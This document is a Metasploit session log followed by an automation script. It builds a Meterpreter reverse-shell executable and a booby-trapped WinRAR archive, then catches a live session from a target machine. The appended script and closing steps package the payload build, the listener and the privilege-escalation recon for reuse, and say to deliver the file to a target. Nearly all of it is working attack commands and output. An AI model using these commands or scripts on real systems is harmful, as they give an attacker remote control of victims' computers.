
root@root:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.112 lport=4444 -f exe -o /root/Desktop/sk.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the
payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/Desktop/sk.exe
root@root:~# msfconsole
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file

=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

msf5 > search encoder

Matching Modules
================

   #   Name                                              Disclosure Date  Rank       Check  Description
   -   ----                                              ---------------  ----       -----  -----------
   1   encoder/cmd/brace                                                  low        No     Bash Brace Expansion Command Encoder
   2   encoder/cmd/echo                                                   good       No     Echo Command Encoder
   3   encoder/cmd/generic_sh                                             manual     No     Generic Shell Variable Substitution Command Encoder
   4   encoder/cmd/ifs                                                    low        No     Bourne ${IFS} Substitution Command Encoder
   5   encoder/cmd/perl                                                   normal     No     Perl Command Encoder
   6   encoder/cmd/powershell_base64                                      excellent  No     Powershell Base64 Command Encoder
   7   encoder/cmd/printf_php_mq                                          manual     No     printf(1) via PHP magic_quotes Utility Command Encoder
   8   encoder/generic/eicar                                              manual     No     The EICAR Encoder
   9   encoder/generic/none                                               normal     No     The "none" Encoder
   10  encoder/mipsbe/byte_xori                                           normal     No     Byte XORi Encoder
   11  encoder/mipsbe/longxor                                             normal     No     XOR Encoder
   12  encoder/mipsle/byte_xori                                           normal     No     Byte XORi Encoder
   13  encoder/mipsle/longxor                                             normal     No     XOR Encoder
   14  encoder/php/base64                                                 great      No     PHP Base64 Encoder
   15  encoder/ppc/longxor                                                normal     No     PPC LongXOR Encoder
   16  encoder/ppc/longxor_tag                                            normal     No     PPC LongXOR Encoder
   17  encoder/ruby/base64                                                great      No     Ruby Base64 Encoder
   18  encoder/sparc/longxor_tag                                          normal     No     SPARC DWORD XOR Encoder
   19  encoder/x64/xor                                                    normal     No     XOR Encoder
   20  encoder/x64/xor_dynamic                                            normal     No     Dynamic key XOR Encoder
   21  encoder/x64/zutto_dekiru                                           manual     No     Zutto Dekiru
   22  encoder/x86/add_sub                                                manual     No     Add/Sub Encoder
   23  encoder/x86/alpha_mixed                                            low        No     Alpha2 Alphanumeric Mixedcase Encoder
   24  encoder/x86/alpha_upper                                            low        No     Alpha2 Alphanumeric Uppercase Encoder
   25  encoder/x86/avoid_underscore_tolower                               manual     No     Avoid underscore/tolower
   26  encoder/x86/avoid_utf8_tolower                                     manual     No     Avoid UTF8/tolower
   27  encoder/x86/bloxor                                                 manual     No     BloXor - A Metamorphic Block Based XOR Encoder
   28  encoder/x86/bmp_polyglot                                           manual     No     BMP Polyglot
   29  encoder/x86/call4_dword_xor                                        normal     No     Call+4 Dword XOR Encoder
   30  encoder/x86/context_cpuid                                          manual     No     CPUID-based Context Keyed Payload Encoder
   31  encoder/x86/context_stat                                           manual     No     stat(2)-based Context Keyed Payload Encoder
   32  encoder/x86/context_time                                           manual     No     time(2)-based Context Keyed Payload Encoder
   33  encoder/x86/countdown                                              normal     No     Single-byte XOR Countdown Encoder
   34  encoder/x86/fnstenv_mov                                            normal     No     Variable-length Fnstenv/mov Dword XOR Encoder
   35  encoder/x86/jmp_call_additive                                      normal     No     Jump/Call XOR Additive Feedback Encoder
   36  encoder/x86/nonalpha                                               low        No     Non-Alpha Encoder
   37  encoder/x86/nonupper                                               low        No     Non-Upper Encoder
   38  encoder/x86/opt_sub                                                manual     No     Sub Encoder (optimised)
   39  encoder/x86/service                                                manual     No     Register Service
   40  encoder/x86/shikata_ga_nai                                         excellent  No     Polymorphic XOR Additive Feedback Encoder
   41  encoder/x86/single_static_bit                                      manual     No     Single Static Bit
   42  encoder/x86/unicode_mixed                                          manual     No     Alpha2 Alphanumeric Unicode Mixedcase Encoder
   43  encoder/x86/unicode_upper                                          manual     No     Alpha2 Alphanumeric Unicode Uppercase Encoder
   44  encoder/x86/xor_dynamic                                            normal     No     Dynamic key XOR Encoder
   45  exploit/windows/browser/ms08_053_mediaencoder     2008-09-09       normal     No     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
   46  exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro      2010-06-08       great      No     HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
   47  exploit/windows/http/novell_messenger_acceptlang  2006-04-13       average    No     Novell Messenger Server 2.0 Accept-Language Overflow

msf5 > search winrar

Matching Modules
================

   #  Name                                             Disclosure Date  Rank       Check  Description
   -  ----                                             ---------------  ----       -----  -----------
   1  exploit/windows/fileformat/winrar_ace            2019-02-05       excellent  No     RARLAB WinRAR ACE Format Input Validation Remote Code Execution
   2  exploit/windows/fileformat/winrar_name_spoofing  2009-09-28       excellent  No     WinRAR Filename Spoofing

msf5 > exploit/windows/fileformat/winrar_name_spoofing
[-] Unknown command: exploit/windows/fileformat/winrar_name_spoofing.
This is a module we can load. Do you want to use exploit/windows/fileformat/winrar_name_spoofing? [y/N] y
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(windows/fileformat/winrar_name_spoofing) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/fileformat/winrar_name_spoofing) > set FILENAME samk.zip
FILENAME => samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > exploit

[*] Creating 'samk.zip' file...
[+] samk.zip stored at /root/.msf4/local/samk.zip
msf5 exploit(windows/fileformat/winrar_name_spoofing) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.0.112
lhost => 192.168.0.112
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.112    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.0.112:4444
[*] Sending stage (179779 bytes) to 192.168.0.111
[*] Meterpreter session 1 opened (192.168.0.112:4444 -> 192.168.0.111:1849) at 2019-07-26 08:14:50 -0400
[*] Sending stage (179779 bytes) to 192.168.0.111

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   1  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

msf5 exploit(multi/handler) > post/multi/recon/local_exploit_suggester
[-] Unknown command: post/multi/recon/local_exploit_suggester.
This is a module we can load. Do you want to use post/multi/recon/local_exploit_suggester? [y/N] y
msf5 post(multi/recon/local_exploit_suggester) >
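The session above types every step by hand and trips over the shell twice (a module path entered at the prompt instead of `use <module>`, and `show option` instead of `show options`). The script below is an added example, not part of the original transcript: it builds the same payload with msfvenom when the tool is installed, records the executable's SHA-256 for later detection testing, and writes two msfconsole resource scripts that replay the `multi/handler` setup and the `local_exploit_suggester` step the transcript stops at. LHOST, LPORT and the payload name are taken from the transcript as defaults; the file names `handler.rc`, `suggester.rc` and `sk.exe` and the helper function names are this example's own choices. `ExitOnSession`, `exploit -j -z` and the suggester's `SESSION` / `SHOWDESCRIPTION` options are standard Metasploit options.

```shell
#!/bin/sh
# Added example (not from the original transcript): a repeatable version of the
# msfvenom -> multi/handler -> local_exploit_suggester sequence shown above.
# Run the generated scripts with:  msfconsole -q -r "$OUTDIR/handler.rc"

# Assumed lab values, copied from the transcript; override via the environment.
LHOST="${LHOST:-192.168.0.112}"
LPORT="${LPORT:-4444}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
OUTDIR="${OUTDIR:-$(mktemp -d)}"

# is_ipv4 ADDR -> exit 0 only if ADDR is a dotted quad with every octet 0..255.
is_ipv4() {
  case $1 in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # empty, non-digit, leading/trailing/double dot
  esac
  _ifs=$IFS; IFS=.
  set -- $1                                 # split on dots (tokens are digits only)
  IFS=$_ifs
  [ "$#" -eq 4 ] || return 1
  for _o in "$@"; do
    [ "$_o" -le 255 ] || return 1
  done
  return 0
}

# is_port N -> exit 0 only if N is an integer in 1..65535.
is_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# handler_rc LHOST LPORT PAYLOAD -> resource script on stdout.
# ExitOnSession=false plus -j keeps the listener running as a job, so a second
# stager connection (the transcript shows the stage being sent twice) becomes
# session 2 instead of being dropped after the first session opens.
handler_rc() {
  printf '%s\n' \
    "use exploit/multi/handler" \
    "set PAYLOAD $3" \
    "set LHOST $1" \
    "set LPORT $2" \
    "set ExitOnSession false" \
    "exploit -j -z"
}

# suggester_rc SESSION -> resource script that runs the local exploit suggester
# against an already-opened session (the step the transcript ends on).
suggester_rc() {
  printf '%s\n' \
    "use post/multi/recon/local_exploit_suggester" \
    "set SESSION $1" \
    "set SHOWDESCRIPTION true" \
    "run"
}

# build_payload OUTFILE -> same executable as the first command in the transcript,
# plus a SHA-256 next to it for the blue team / AV test. Returns 2 if msfvenom is absent.
build_payload() {
  command -v msfvenom >/dev/null 2>&1 || return 2
  msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$1" || return 1
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" > "$1.sha256"
  fi
}

main() {
  is_ipv4 "$LHOST" || { echo "bad LHOST: $LHOST" >&2; return 1; }
  is_port "$LPORT" || { echo "bad LPORT: $LPORT" >&2; return 1; }
  handler_rc "$LHOST" "$LPORT" "$PAYLOAD" > "$OUTDIR/handler.rc"
  suggester_rc 1 > "$OUTDIR/suggester.rc"
  build_payload "$OUTDIR/sk.exe" || echo "msfvenom not found, payload not built" >&2
  echo "resource scripts written to $OUTDIR"
}

main
```

Start the listener first (`msfconsole -q -r handler.rc`), deliver the executable or the WinRAR archive to the target, then `resource suggester.rc` from the msf prompt once session 1 is up; change `set SESSION 1` if the session number differs.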
